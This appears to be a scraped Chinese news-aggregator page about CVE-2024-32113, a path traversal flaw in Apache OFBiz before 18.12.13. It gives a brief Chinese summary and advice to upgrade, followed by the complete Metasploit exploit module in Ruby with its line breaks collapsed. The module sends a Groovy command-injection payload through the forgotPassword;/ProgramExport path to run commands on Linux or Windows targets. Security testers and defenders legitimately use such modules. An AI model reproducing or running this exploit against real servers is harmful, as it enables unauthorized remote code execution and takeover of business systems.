index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html
![]()
Apache OFBiz 18.12.13 之前的版本存在路径遍历漏洞。攻击者可以利用该漏洞访问 /webtools/control/forgotPassword 端点,进而访问 ProgramExport 端点,最终以运行应用程序的用户身份执行远程代码。
🎯 该漏洞影响 Apache OFBiz 18.12.13 之前的版本,攻击者可利用该漏洞访问 /webtools/control/forgotPassword 端点。
🎯 攻击者可以通过访问 ProgramExport 端点以运行应用程序的用户身份执行远程代码,从而获得对系统的控制权。
🎯 该漏洞利用了 Apache OFBiz 中的路径遍历漏洞,攻击者可以利用该漏洞访问应用程序的敏感文件和目录。
🎯 该漏洞的利用可能会导致数据泄露、系统崩溃或其他安全问题。
🎯 建议所有使用 Apache OFBiz 的用户尽快升级到最新版本或应用安全补丁以修复该漏洞。
This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientprepend Msf::Exploit::Remote::AutoCheckdef initialize(info = {})super(update_info(info,'Name' => 'Apache OFBiz Forgot Password Directory Traversal','Description' => %q{Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerableendpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which inturn allows for remote code execution in the context of the user running the application.},'Author' => ['Mr-xn', # PoC'jheysel-r7' # module],'References' => [[ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],[ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],[ 'CVE', '2024-32113']],'License' => MSF_LICENSE,'Platform' => %w[linux win],'Privileged' => true, # You get a root session when exploiting a docker container though user level session on Windows.'Arch' => [ ARCH_CMD ],'Targets' => [['Linux Command',{'Platform' => ['linux', 'unix'],'Arch' => [ARCH_CMD],'Type' => :unix_cmd}],['Windows Command',{'Platform' => ['win'],'Arch' => [ARCH_CMD],'Type' => :win_cmd}],],'Payload' => {'BadChars' => "\x3a"},'DefaultTarget' => 0,'DisclosureDate' => '2024-05-30','Notes' => {'Stability' => [ CRASH_SAFE, ],'SideEffects' => [ ARTIFACTS_ON_DISK, ],'Reliability' => [ REPEATABLE_SESSION, ]},'DefaultOptions' => {'SSL' => true,'RPORT' => 8443}))enddef send_cmd_injection(cmd)data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"send_request_cgi({'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),'headers' => {'HOST' => '127.0.0.1'},'method' => 'POST','data' => data})enddef checkecho_test_string = rand_text_alpha(8..12)case target['Type']when :win_cmdtest_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")when :unix_cmdtest_payload = to_unicode_escape("echo #{echo_test_string}")elsereturn CheckCode::Unknown('Please select a valid target')endres = send_cmd_injection(test_payload)return CheckCode::Unknown('Target did not respond to check.') unless resunless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty?return CheckCode::Vulnerable('Tested remote code execution successfully')endCheckCode::Safe('Attempting to exploit vulnerability failed.')enddef to_unicode_escape(str)str.chars.map { |char| '\u%04x' % char.ord }.joinenddef exploitprint_status('Attempting to exploit...')res = ''case target['Type']when :win_cmdres = send_cmd_injection(payload.encoded)when :unix_cmdres = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))elsefail_with(Failure::BadConfig, 'Invalid target specified')endprint_error('The target responded to the exploit attempt which is not expected. The exploit likely failed') if resendend
